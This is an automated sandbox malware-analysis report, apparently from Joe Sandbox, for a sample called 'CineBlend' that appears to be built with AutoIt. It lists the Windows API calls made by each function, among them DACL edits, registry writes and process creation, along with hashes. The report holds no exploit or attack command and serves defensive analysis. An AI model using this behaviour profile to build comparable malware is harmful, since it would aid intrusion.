                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                          • String ID: AutoIt v3 GUI
                                          • API String ID: 1458621304-248962490
                                          • Opcode ID: e8bbddf524ac77ab9e8a50bcdd80be41f6347263cfd064a35bbfc37ae4759aa9
                                          • Instruction ID: b49b5af1724e42b1179c04494d75547cfea16bde3761cdbefc46653aaf4675ee
                                          • Opcode Fuzzy Hash: e8bbddf524ac77ab9e8a50bcdd80be41f6347263cfd064a35bbfc37ae4759aa9
                                          • Instruction Fuzzy Hash: 0CB19C35A0020A9FDB14DFA8DC95BEE7BF4FB48714F10415AFA46A72A0DB74E940DB50
                                          APIs
                                            • Part of subcall function 00BA1A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00BA1A60
                                            • Part of subcall function 00BA1A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00BA14E7,?,?,?), ref: 00BA1A6C
                                            • Part of subcall function 00BA1A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00BA14E7,?,?,?), ref: 00BA1A7B
                                            • Part of subcall function 00BA1A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00BA14E7,?,?,?), ref: 00BA1A82
                                            • Part of subcall function 00BA1A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00BA1A99
                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00BA1741
                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00BA1775
                                          • GetLengthSid.ADVAPI32(?), ref: 00BA178C
                                          • GetAce.ADVAPI32(?,00000000,?), ref: 00BA17C6
                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00BA17E2
                                          • GetLengthSid.ADVAPI32(?), ref: 00BA17F9
                                          • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00BA1801
                                          • HeapAlloc.KERNEL32(00000000), ref: 00BA1808
                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00BA1829
                                          • CopySid.ADVAPI32(00000000), ref: 00BA1830
                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00BA185F
                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00BA1881
                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00BA1893
                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00BA18BA
                                          • HeapFree.KERNEL32(00000000), ref: 00BA18C1
                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00BA18CA
                                          • HeapFree.KERNEL32(00000000), ref: 00BA18D1
                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00BA18DA
                                          • HeapFree.KERNEL32(00000000), ref: 00BA18E1
                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00BA18ED
                                          • HeapFree.KERNEL32(00000000), ref: 00BA18F4
                                            • Part of subcall function 00BA1ADF: GetProcessHeap.KERNEL32(00000008,00BA14FD,?,00000000,?,00BA14FD,?), ref: 00BA1AED
                                            • Part of subcall function 00BA1ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00BA14FD,?), ref: 00BA1AF4
                                            • Part of subcall function 00BA1ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00BA14FD,?), ref: 00BA1B03
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                          • String ID:
                                          • API String ID: 4175595110-0
                                          • Opcode ID: 2a6f3a39f83098a6e43627e11234b8d182dc8296c9f4c384a254d84c2f484eb9
                                          • Instruction ID: 7d5a0c8b8e3d53690ca7db0ac74cca0f436122d5f56fc98c5adb95961db9f844
                                          • Opcode Fuzzy Hash: 2a6f3a39f83098a6e43627e11234b8d182dc8296c9f4c384a254d84c2f484eb9
                                          • Instruction Fuzzy Hash: 60717AB2D0520ABBDF50DFA8DC44FAEBBB8FF45300F144666E955A7190EB349A05CB60
                                          APIs
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BCCF1D
                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00BDDCD0,00000000,?,00000000,?,?), ref: 00BCCFA4
                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00BCD004
                                          • _wcslen.LIBCMT ref: 00BCD054
                                          • _wcslen.LIBCMT ref: 00BCD0CF
                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00BCD112
                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00BCD221
                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00BCD2AD
                                          • RegCloseKey.ADVAPI32(?), ref: 00BCD2E1
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00BCD2EE
                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00BCD3C0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                          • API String ID: 9721498-966354055
                                          • Opcode ID: c35d8dc4e31cd48141a385cb4bdf8752010a1f17516fdf5d296b6dfafb53bc7d
                                          • Instruction ID: 4d03f3c0d4507332cbf009ea34e7a64ea13b1937e8be92d5262aa553dcc1ce53
                                          • Opcode Fuzzy Hash: c35d8dc4e31cd48141a385cb4bdf8752010a1f17516fdf5d296b6dfafb53bc7d
                                          • Instruction Fuzzy Hash: A31237356042019FD714EF14C891F2ABBE5EF88714F1488ADF99A9B3A2CB35ED45CB81
                                          APIs
                                          • CharUpperBuffW.USER32(?,?), ref: 00BD1462
                                          • _wcslen.LIBCMT ref: 00BD149D
                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00BD14F0
                                          • _wcslen.LIBCMT ref: 00BD1526
                                          • _wcslen.LIBCMT ref: 00BD15A2
                                          • _wcslen.LIBCMT ref: 00BD161D
                                            • Part of subcall function 00B5FD52: _wcslen.LIBCMT ref: 00B5FD5D
                                            • Part of subcall function 00BA3535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00BA3547
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: _wcslen$MessageSend$BuffCharUpper
                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                          • API String ID: 1103490817-4258414348
                                          • Opcode ID: ad6430700cbda336c0572b93b55af90a0de07d015cadf6fab99c7544217067b0
                                          • Instruction ID: d6751dfb5cd27677ae03c10b9dcb43a2cd2cc93cc405f755854193926d7ee678
                                          • Opcode Fuzzy Hash: ad6430700cbda336c0572b93b55af90a0de07d015cadf6fab99c7544217067b0
                                          • Instruction Fuzzy Hash: D1E16D716087019FCB14EF28C45092AF7E2FF94314B14899EF8965B3A2EB31EE45CB91
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: _wcslen$BuffCharUpper
                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                          • API String ID: 1256254125-909552448
                                          • Opcode ID: ff8c7f789a5bb4c68ce50a232c5f91b1fe4a2cf4488a03b218f430be0604ca89
                                          • Instruction ID: d8a351b1b6b0bdba152d2e3cf961c8cd0e31c308499a38b6cc9fd20449cbe8dd
                                          • Opcode Fuzzy Hash: ff8c7f789a5bb4c68ce50a232c5f91b1fe4a2cf4488a03b218f430be0604ca89
                                          • Instruction Fuzzy Hash: C471C37A60052A8BCB109E6CCD51FBB33E1EB70758B2241BCF85697394EA35DD49C7A0
                                          APIs
                                          • _wcslen.LIBCMT ref: 00BD8DB5
                                          • _wcslen.LIBCMT ref: 00BD8DC9
                                          • _wcslen.LIBCMT ref: 00BD8DEC
                                          • _wcslen.LIBCMT ref: 00BD8E0F
                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00BD8E4D
                                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00BD6691), ref: 00BD8EA9
                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00BD8EE2
                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00BD8F25
                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00BD8F5C
                                          • FreeLibrary.KERNEL32(?), ref: 00BD8F68
                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00BD8F78
                                          • DestroyIcon.USER32(?,?,?,?,?,00BD6691), ref: 00BD8F87
                                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00BD8FA4
                                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00BD8FB0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                          • String ID: .dll$.exe$.icl
                                          • API String ID: 799131459-1154884017
                                          • Opcode ID: eb678bc1aacdb06f23966cf92c69d2029e74932ab1309abe3632227cc889a228
                                          • Instruction ID: 473e7db1a5dda52d424bb45e58023e2d0cf0f1d4b38c047df77bf83b168e5076
                                          • Opcode Fuzzy Hash: eb678bc1aacdb06f23966cf92c69d2029e74932ab1309abe3632227cc889a228
                                          • Instruction Fuzzy Hash: 7A61EE71900615BAEB14DF64DC41BBEBBE8FF08B11F108596F915D62D1EF74AA80CBA0
                                          APIs
                                          • CharLowerBuffW.USER32(?,?), ref: 00BB493D
                                          • _wcslen.LIBCMT ref: 00BB4948
                                          • _wcslen.LIBCMT ref: 00BB499F
                                          • _wcslen.LIBCMT ref: 00BB49DD
                                          • GetDriveTypeW.KERNEL32(?), ref: 00BB4A1B
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00BB4A63
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00BB4A9E
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00BB4ACC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: SendString_wcslen$BuffCharDriveLowerType
                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                          • API String ID: 1839972693-4113822522
                                          • Opcode ID: 330558b2d47a2c1679773ca3ea9194759690c3969d9af78d1f04304d824f8b73
                                          • Instruction ID: f95c8184baafeed3925cddb84b70a8a47d9d82acc5f203b628c5b0862f45f051
                                          • Opcode Fuzzy Hash: 330558b2d47a2c1679773ca3ea9194759690c3969d9af78d1f04304d824f8b73
                                          • Instruction Fuzzy Hash: B271E3729082019FC714EF24C8809BBB7E4FF94758F1049ADF89597292EB71EE45CB91
                                          APIs
                                          • LoadIconW.USER32(00000063), ref: 00BA6395
                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00BA63A7
                                          • SetWindowTextW.USER32(?,?), ref: 00BA63BE
                                          • GetDlgItem.USER32(?,000003EA), ref: 00BA63D3
                                          • SetWindowTextW.USER32(00000000,?), ref: 00BA63D9
                                          • GetDlgItem.USER32(?,000003E9), ref: 00BA63E9
                                          • SetWindowTextW.USER32(00000000,?), ref: 00BA63EF
                                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00BA6410
                                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00BA642A
                                          • GetWindowRect.USER32(?,?), ref: 00BA6433
                                          • _wcslen.LIBCMT ref: 00BA649A
                                          • SetWindowTextW.USER32(?,?), ref: 00BA64D6
                                          • GetDesktopWindow.USER32 ref: 00BA64DC
                                          • GetWindowRect.USER32(00000000), ref: 00BA64E3
                                          • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00BA653A
                                          • GetClientRect.USER32(?,?), ref: 00BA6547
                                          • PostMessageW.USER32(?,00000005,00000000,?), ref: 00BA656C
                                          • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00BA6596
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                          • String ID:
                                          • API String ID: 895679908-0
                                          • Opcode ID: 609e043522b2c71661b19e90a6f9662b85b79418c9036a04a985678baa05b01e
                                          • Instruction ID: 39ced08e162f1e85b3fc9e4918dc56d07fd562da5ee8a08f89d7bf7652c4c082
                                          • Opcode Fuzzy Hash: 609e043522b2c71661b19e90a6f9662b85b79418c9036a04a985678baa05b01e
                                          • Instruction Fuzzy Hash: F1719A71904609AFDB20DFA8CE85BAEBBF5FF08704F140959E186A36A0DB71E944CB50
                                          APIs
                                          • LoadCursorW.USER32(00000000,00007F89), ref: 00BC0884
                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 00BC088F
                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00BC089A
                                          • LoadCursorW.USER32(00000000,00007F03), ref: 00BC08A5
                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 00BC08B0
                                          • LoadCursorW.USER32(00000000,00007F01), ref: 00BC08BB
                                          • LoadCursorW.USER32(00000000,00007F81), ref: 00BC08C6
                                          • LoadCursorW.USER32(00000000,00007F88), ref: 00BC08D1
                                          • LoadCursorW.USER32(00000000,00007F80), ref: 00BC08DC
                                          • LoadCursorW.USER32(00000000,00007F86), ref: 00BC08E7
                                          • LoadCursorW.USER32(00000000,00007F83), ref: 00BC08F2
                                          • LoadCursorW.USER32(00000000,00007F85), ref: 00BC08FD
                                          • LoadCursorW.USER32(00000000,00007F82), ref: 00BC0908
                                          • LoadCursorW.USER32(00000000,00007F84), ref: 00BC0913
                                          • LoadCursorW.USER32(00000000,00007F04), ref: 00BC091E
                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00BC0929
                                          • GetCursorInfo.USER32(?), ref: 00BC0939
                                          • GetLastError.KERNEL32 ref: 00BC097B
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Cursor$Load$ErrorInfoLast
                                          • String ID:
                                          • API String ID: 3215588206-0
                                          • Opcode ID: fa214101f5cdb0a44b0d9a4ae40c8d0e99161d1b12858af16d42cd34c731aa47
                                          • Instruction ID: 3ab44255c70dbd231447c3077f2a772005d5173f9e0410986fd4e8a4e0fe1959
                                          • Opcode Fuzzy Hash: fa214101f5cdb0a44b0d9a4ae40c8d0e99161d1b12858af16d42cd34c731aa47
                                          • Instruction Fuzzy Hash: B84172B0D08319AADB109FBA8C89D6EBFE8FF04750B50456AE15CE7281DA78D901CF91
                                          APIs
                                          • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00B60436
                                            • Part of subcall function 00B6045D: InitializeCriticalSectionAndSpinCount.KERNEL32(00C1170C,00000FA0,08AB8DE6,?,?,?,?,00B82733,000000FF), ref: 00B6048C
                                            • Part of subcall function 00B6045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00B82733,000000FF), ref: 00B60497
                                            • Part of subcall function 00B6045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00B82733,000000FF), ref: 00B604A8
                                            • Part of subcall function 00B6045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00B604BE
                                            • Part of subcall function 00B6045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00B604CC
                                            • Part of subcall function 00B6045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00B604DA
                                            • Part of subcall function 00B6045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00B60505
                                            • Part of subcall function 00B6045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00B60510
                                          • ___scrt_fastfail.LIBCMT ref: 00B60457
                                            • Part of subcall function 00B60413: __onexit.LIBCMT ref: 00B60419
                                          Strings
                                          • SleepConditionVariableCS, xrefs: 00B604C4
                                          • WakeAllConditionVariable, xrefs: 00B604D2
                                          • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00B60492
                                          • InitializeConditionVariable, xrefs: 00B604B8
                                          • kernel32.dll, xrefs: 00B604A3
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                          • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                          • API String ID: 66158676-1714406822
                                          • Opcode ID: 90787bc2988479a7131f23a43b327b144f69a5414f00eaa974a4c6933333947a
                                          • Instruction ID: ab8ea37d08d7ab685fc77e4f2ee68d13b4bdd3d5268b053ef3c33d78c0490b41
                                          • Opcode Fuzzy Hash: 90787bc2988479a7131f23a43b327b144f69a5414f00eaa974a4c6933333947a
                                          • Instruction Fuzzy Hash: 1D213B326657056BD7213BA6AC56B6B73E4EF05F61F0441A6FD02A33D0EFB88C408A94
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: _wcslen
                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                          • API String ID: 176396367-1603158881
                                          • Opcode ID: cf5774108ad44723fbad7aec1612a132cad9e732092d8c3266a608e588dacba0
                                          • Instruction ID: a7bfa3846b2d18b0cb6453f7581c542b6b629bb938dba73ede58aa45b4af66b6
                                          • Opcode Fuzzy Hash: cf5774108ad44723fbad7aec1612a132cad9e732092d8c3266a608e588dacba0
                                          • Instruction Fuzzy Hash: DAE1F332A08516ABCB149F74C8816EDFBF1FF16B10F1041A9F456E7290EB309E55D7A0
                                          APIs
                                          • CharLowerBuffW.USER32(00000000,00000000,00BDDCD0), ref: 00BB4F6C
                                          • _wcslen.LIBCMT ref: 00BB4F80
                                          • _wcslen.LIBCMT ref: 00BB4FDE
                                          • _wcslen.LIBCMT ref: 00BB5039
                                          • _wcslen.LIBCMT ref: 00BB5084
                                          • _wcslen.LIBCMT ref: 00BB50EC
                                            • Part of subcall function 00B5FD52: _wcslen.LIBCMT ref: 00B5FD5D
                                          • GetDriveTypeW.KERNEL32(?,00C07C10,00000061), ref: 00BB5188
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: _wcslen$BuffCharDriveLowerType
                                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                          • API String ID: 2055661098-1000479233
                                          • Opcode ID: a7b265da1e42ec49b763fdb96e63843740796e39e1261e39539964a73784dae9
                                          • Instruction ID: 2098a6410d35788dbcd183ba2e810c74d05e6e96e6e31353b816b261a74c1f60
                                          • Opcode Fuzzy Hash: a7b265da1e42ec49b763fdb96e63843740796e39e1261e39539964a73784dae9
                                          • Instruction Fuzzy Hash: 50B1C1316087029FC724EF28C890BBAB7E5FFA4710F50499DF49697292DBB0D944CA93
                                          APIs
                                          • _wcslen.LIBCMT ref: 00BCBBF8
                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00BCBC10
                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00BCBC34
                                          • _wcslen.LIBCMT ref: 00BCBC60
                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00BCBC74
                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00BCBC96
                                          • _wcslen.LIBCMT ref: 00BCBD92
                                            • Part of subcall function 00BB0F4E: GetStdHandle.KERNEL32(000000F6), ref: 00BB0F6D
                                          • _wcslen.LIBCMT ref: 00BCBDAB
                                          • _wcslen.LIBCMT ref: 00BCBDC6
                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00BCBE16
                                          • GetLastError.KERNEL32(00000000), ref: 00BCBE67
                                          • CloseHandle.KERNEL32(?), ref: 00BCBE99
                                          • CloseHandle.KERNEL32(00000000), ref: 00BCBEAA
                                          • CloseHandle.KERNEL32(00000000), ref: 00BCBEBC
                                          • CloseHandle.KERNEL32(00000000), ref: 00BCBECE
                                          • CloseHandle.KERNEL32(?), ref: 00BCBF43
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
